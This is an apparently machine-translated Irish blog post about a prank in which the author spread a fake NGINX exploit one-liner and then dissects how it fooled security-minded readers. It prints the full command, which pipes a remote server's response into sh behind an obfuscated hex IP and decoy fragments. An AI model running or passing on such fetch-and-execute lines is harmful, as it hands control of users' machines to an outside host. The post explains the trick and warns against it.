Nóta. aistrigh.:
TL; DR: Ná húsáid píblíne comhaid i sh nó bash in imthosca ar bith. Is bealach iontach é seo chun smacht a chailleadh ar do ríomhaire.
Ba mhaith liom gearrscéal a roinnt leat faoi shaothrú grinn PoC a cruthaíodh an 31 Bealtaine. Tháinig sé go pras mar fhreagra ar nuacht ó
Tar éis dom a bheith ag obair ar theicníc nua obfuscation in curl, luaigh mé an tweet bunaidh agus “sceitheadh PoC oibre" comhdhéanta de líne singil de chód a bhaineann leas as an leochaileacht a aimsíodh. Ar ndóigh, bhí sé seo nonsense iomlán. Ghlac mé leis go mbeinn faoi lé láithreach, agus go bhfaighfinn cúpla retweets (oh well).
Mar sin féin, ní raibh mé in ann a shamhlú cad a tharla ina dhiaidh sin. Tháinig ardú mór ar an éileamh atá ar mo thweet. Is ionadh é, i láthair na huaire (15:00 am Moscó 1 Meitheamh) is beag duine a thuig gur falsa é seo. Déanann go leor daoine é a ath-tweetáil gan é a sheiceáil ar chor ar bith (gan trácht ar na grafaicí álainn ASCII a aschuireann sé).
Féach cé chomh hálainn is atá sé!
Cé go bhfuil na lúba agus na dathanna seo go léir iontach, is léir go raibh ar dhaoine cód a rith ar a n-inneall chun iad a fheiceáil. Ar ámharaí an tsaoil, oibríonn brabhsálaithe ar an mbealach céanna, agus in éineacht leis an bhfíric nach raibh mé ag iarraidh dul i dtrioblóid dlí, ní raibh an cód curtha ar mo shuíomh ach ag déanamh glaonna macalla gan iarracht a dhéanamh aon chód breise a shuiteáil nó a fhorghníomhú.
Digression beag:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Innealtóireacht shoch-leictreonach (FÉACH) - níos mó ná fioscaireacht amháin
Bhí sábháilteacht agus cur amach mar chuid mhór den turgnamh seo. Sílim gurb iad ba chúis lena rath. Thug an líne ordaithe le tuiscint go soiléir slándáil trí thagairt a dhéanamh do "127.0.0.1" (an localhost aitheanta). Meastar go bhfuil Localhost slán agus ní fhágann na sonraí air do ríomhaire riamh.
Ba é an t-eolas a bhí ar an dara príomh-chomhpháirt SEE den turgnamh. Ós rud é go raibh an spriocghrúpa comhdhéanta go príomha de dhaoine eolach ar bhunghnéithe na slándála ríomhaireachta, bhí sé tábhachtach cód a chruthú ionas go mbeadh an chuma ar chodanna de a bheith eolach agus eolach (agus mar sin sábháilte). D'éirigh thar barr le heilimintí de sheanchoincheapa a shaothrú a fháil ar iasacht agus iad a chomhcheangal ar bhealach neamhghnách.
Anseo thíos tá anailís mhionsonraithe ar an líneáil aon-líne. Caitheann gach rud ar an liosta seo nádúr cosmaideacha, agus beagnach aon rud ag teastáil le haghaidh a oibriú iarbhír.
Cad iad na comhpháirteanna atá riachtanach i ndáiríre? seo -gsS
, -O 0x0238f06a
, |sh
agus an freastalaí gréasáin féin. Ní raibh aon treoracha mailíseacha ar an bhfreastalaí gréasáin, ach sheirbheáil sé grafaic ASCII ag baint úsáide as orduithe echo
sa script atá i index.html
. Nuair a tháinig an t-úsáideoir isteach i líne le |sh
i lár, index.html
luchtaithe agus a fhorghníomhú. Ar ámharaí an tsaoil, ní raibh aon drochintinn ag caomhnóirí an fhreastalaí gréasáin.
-
../../../%00
— is ionann é agus dul thar an eolaire; -
ngx_stream_module.so
— cosán chuig modúl randamach NGINX; -
/bin/sh%00<'protocol:TCP'
- táimid ag seoladh supposedly/bin/sh
ar an meaisín sprice agus an t-aschur a atreorú chuig an gcainéal TCP; -
-O 0x0238f06a#PLToffset
- comhábhar rúnda, forlíonta#PLToffset
, chun breathnú cosúil le fritháireamh cuimhne atá ar bhealach éigin sa PLT; -
|sh;
- blúire tábhachtach eile. B'éigean dúinn an t-aschur a atreorú chuig sh/bash chun an cód a rith ón bhfreastalaí gréasáin ionsaí atá suite ag0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- caochadán ina dtagraíonn netcat/dev/tcp/localhost
ionas go bhféachann gach rud sábháilte arís. Go deimhin, ní dhéanann sé rud ar bith agus tá sé san áireamh sa líne le haghaidh áilleacht.
Cuireann sé seo críoch le díchódú na scripte aonlíne agus an plé ar ghnéithe den “innealtóireacht shoch-leictreonach” (fioscaireacht chasta).
Cumraíocht Freastalaí Gréasáin agus Frithbhearta
Ós rud é gur infosec/hackers iad formhór mór mo shíntiúsóirí, chinn mé an freastalaí gréasáin a dhéanamh beagán níos resistant do léirithe spéise as a gcuid féin, díreach ionas go mbeadh rud éigin le déanamh ag na guys (agus bheadh sé spraoi ar bun). Níl mé chun liosta a dhéanamh de na contúirtí go léir anseo ós rud é go bhfuil an turgnamh fós ar siúl, ach seo roinnt rudaí a dhéanann an freastalaí:
- Monatóireacht ghníomhach a dhéanamh ar iarrachtaí dáileacháin ar líonraí sóisialta áirithe agus ionadaíonn sé mionsamhlacha réamhamhairc éagsúla chun an t-úsáideoir a spreagadh chun cliceáil ar an nasc.
- Atreoraíonn Chrome/Mozilla/Safari/etc chuig an bhfíseán poiblíochta Thugcrowd seachas an script bhlaosc a thaispeáint.
- Uaireadóirí do chomharthaí soiléire cur isteach/hacking soiléir, agus ansin tosaíonn ag atreorú iarratais chuig freastalaithe NSA (ha!).
- Suiteáil Trojan, chomh maith le rootkit BIOS, ar gach ríomhaire a dtugann a n-úsáideoirí cuairt ar an ósta ó bhrabhsálaí rialta (díreach kidding!).
Cuid bheag de animéirí
Sa chás seo, ba é an t-aon sprioc a bhí agam ná cuid de ghnéithe Apache a mháistir - go háirithe, na rialacha fionnuar maidir le hiarratais a atreorú - agus shíl mé: cén fáth nach bhfuil?
Leas a bhaint as NGINX (Fíor!)
Liostáil le
Foinse: will.com